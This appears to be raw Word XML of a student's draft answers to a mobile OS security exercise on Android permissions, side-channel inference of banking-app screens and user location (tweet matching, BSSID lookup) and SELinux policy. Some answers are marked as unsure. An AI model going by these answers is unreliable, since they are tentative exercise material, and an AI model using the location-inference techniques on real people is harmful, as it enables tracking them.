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0339" w:rsidP="3E496231" w:rsidRDefault="2EA4688F" w14:paraId="60FD4489" w14:textId="5ED740B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4F145031" w:rsidR="2EA4688F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile OS Security - Side-Channels on Android - SELinux on Android </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF0339" w:rsidP="3E496231" w:rsidRDefault="2EA4688F" w14:paraId="0265BB12" w14:textId="592FF118">
      <w:r w:rsidRPr="3E496231">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Which one of the following (write the letter corresponding to your selection in your answer sheet): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF0339" w:rsidP="3E496231" w:rsidRDefault="2EA4688F" w14:paraId="2C078E63" w14:textId="57538C6C">
      <w:r w:rsidRPr="3E496231">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>i) best describes how permissions are granted on Android 6 and after?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F99D0C2" w:rsidP="3E496231" w:rsidRDefault="4F99D0C2" w14:paraId="01E0372F" w14:textId="2EB4D6C3">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="3E496231">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>A) Only dangerous permissions are granted at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F99D0C2" w:rsidP="3E496231" w:rsidRDefault="4F99D0C2" w14:paraId="49678A02" w14:textId="39DE4A66">
      <w:r w:rsidRPr="3E496231">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ii) is NOT a way an advertisement (ad) library requests permissions to use?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E496231" w:rsidP="3E496231" w:rsidRDefault="7499A299" w14:paraId="71AB1812" w14:textId="7DE38BBE">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F99D0C2" w:rsidP="3E496231" w:rsidRDefault="4F99D0C2" w14:paraId="596D2E5F" w14:textId="777209FB">
      <w:r w:rsidRPr="3E496231">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>iii) is NOT a common developer error when requesting permissions?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="486E052C" w:rsidP="3E496231" w:rsidRDefault="486E052C" w14:paraId="63193B74" w14:textId="0EF79F58">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C) requesting permissions required by similar apps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="482930F6" w14:textId="6531FBB4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5C995529" w:rsidP="7EA872C9" w:rsidRDefault="5C995529" w14:paraId="0675BD4D" w14:textId="3E99EE84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C995529" w:rsidP="7EA872C9" w:rsidRDefault="5C995529" w14:paraId="49066EAB" w14:textId="37A7E10E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">I) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C995529" w:rsidP="7EA872C9" w:rsidRDefault="5C995529" w14:paraId="41A39A6C" w14:textId="59C39B22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0BB8119F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>A) - -&gt; Home -&gt; Accounts -&gt; Checking     &lt;- Unsure about this one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3FD5529D" w:rsidP="0BB8119F" w:rsidRDefault="3FD5529D" w14:paraId="693BEE0D" w14:textId="79AF1D31">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3FD5529D" w:rsidP="0BB8119F" w:rsidRDefault="3FD5529D" w14:paraId="7A7F0359" w14:textId="539C0765">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>t1: x--&gt;home, t2: home--&gt;accounts--&gt;home, t3: home--&gt;quickpay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C995529" w:rsidP="7EA872C9" w:rsidRDefault="71E60E21" w14:paraId="3415C0B3" w14:textId="301111D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="62D4E821">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidRPr="62D4E821" w:rsidR="7D5705B1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:commentRangeStart w:id="0"/>
      <w:commentRangeEnd w:id="0"/>
      <w:r w:rsidR="5C995529">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:commentRangeEnd w:id="1"/>
      <w:r w:rsidR="5C995529">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
      <w:r w:rsidRPr="62D4E821" w:rsidR="7D5705B1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>-&gt; Home -&gt;Accounts -&gt;Savings OR - -&gt;home-&gt;products-&gt;loans-&gt;personal loan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C995529" w:rsidP="7EA872C9" w:rsidRDefault="5C995529" w14:paraId="5D4F7C6E" w14:textId="7F539C7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">C) - -&gt; Home OR Accounts -&gt; Checking </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5C995529" w:rsidP="7EA872C9" w:rsidRDefault="5C995529" w14:paraId="6EEF5CF2" w14:textId="2CF369A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">D) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="47338E82">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">- -&gt; Home -&gt; Checking OR Home -&gt; Quickpay </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="381A9C99">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>OR maybe - -&gt; Home -&gt; Products -&gt; Overdraft ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="5C1333DF" w14:textId="58C5CF81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="381A9C99" w:rsidP="7EA872C9" w:rsidRDefault="381A9C99" w14:paraId="0DBCA7E7" w14:textId="1B72C9B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Ii) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="6D0D01CC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Joey because he’s the only with 3 tweets that match the places and times. Phoebe is clos</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="7FBC92D6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">e but </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="6D0D01CC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>has extra tweets</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="47C4C9CE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="47C4C9CE" w:rsidP="7EA872C9" w:rsidRDefault="47C4C9CE" w14:paraId="65754B9A" w14:textId="0DC972A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="OLE_LINK5" w:id="2"/>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>If the device is connected to a Wireless Access Point</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="3E617808">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WAP)</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, the BSSID of the WAP</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="4CCA8BBD">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be looked up in a database which holds mappings of BSSIDs to locations. </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="094C3D20" w14:textId="15B56B7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5C84CCA9" w:rsidP="7EA872C9" w:rsidRDefault="5C84CCA9" w14:paraId="4E74FCDD" w14:textId="4447BC4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0BB8119F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="4FFFE394" w14:textId="1FBD56D1">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Part i:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="15323B33" w14:textId="0018C91A">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:bookmarkStart w:name="OLE_LINK1" w:id="3"/>
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">attributes </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="426C811C" w14:textId="2F2DEE3F">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>attribute domain;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="69009E6E" w14:textId="0A6872A5">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>attribute file_type;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="02512E86" w14:textId="7E5A149A">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Part ii:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="35EC9C61" w14:textId="04760CFA">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>In file.te:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="7AEFDC8B" w14:textId="02E995B9">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>type top_secret_file, file_type;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="7810524F" w14:textId="472B6AEB">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Part iii:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="5C53431A" w14:textId="261CB005">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>In file_contexts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="4F145031" w:rsidRDefault="6B6343C0" w14:paraId="5B05D572" w14:textId="16F80BD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/confidential/</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>top_secret_file</w:t>
      </w:r>
      <w:bookmarkStart w:name="OLE_LINK2" w:id="4"/>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>u:object</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:commentRangeStart w:id="979529574"/>
      <w:commentRangeStart w:id="1233167956"/>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:commentRangeEnd w:id="979529574"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="979529574"/>
      </w:r>
      <w:commentRangeEnd w:id="1233167956"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1233167956"/>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="4F145031" w:rsidR="6B6343C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="61D5E426" w14:textId="5FE2A11F">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Part iv:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="0BB8119F" w:rsidRDefault="6B6343C0" w14:paraId="33295FB0" w14:textId="3F2350BB">
      <w:r w:rsidRPr="0E43A8E4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
